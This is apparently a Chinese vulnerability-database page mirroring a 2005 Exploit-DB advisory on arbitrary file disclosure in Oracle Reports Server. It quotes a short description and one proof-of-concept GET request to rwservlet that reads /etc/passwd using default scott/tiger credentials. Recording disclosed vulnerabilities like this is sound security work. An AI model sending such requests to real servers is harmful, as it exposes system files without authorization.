Oracle Reports Server 6.0.8/9.0.x – Arbitrary File Disclosure

Oracle Reports Server 6.0.8/9.0.x – Arbitrary File Disclosure

漏洞ID 1055269 漏洞类型
发布时间 2005-07-19 更新时间 2005-07-19
图片[1]-Oracle Reports Server 6.0.8/9.0.x – Arbitrary File Disclosure-安全小百科CVE编号 N/A
图片[2]-Oracle Reports Server 6.0.8/9.0.x – Arbitrary File Disclosure-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/26003
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14312/info

Oracle Reports Server may allow remote attackers to disclose parts of arbitrary files.

Reportedly, the server fails to restrict users from accessing parts of arbitrary files when handling specially crafted HTTP GET requests.

All versions of Oracle Reports Server are reported to be vulnerable to this issue. 

http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=sc
ott/tiger@iasdb+destype=file+MODE=CHARACTER+desformat=/etc/passwd

相关推荐: Apache mod_userdir Module Information Disclosure Vulnerability

Apache mod_userdir Module Information Disclosure Vulnerability 漏洞ID 1099150 漏洞类型 Configuration Error 发布时间 2003-12-04 更新时间 2003-12-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享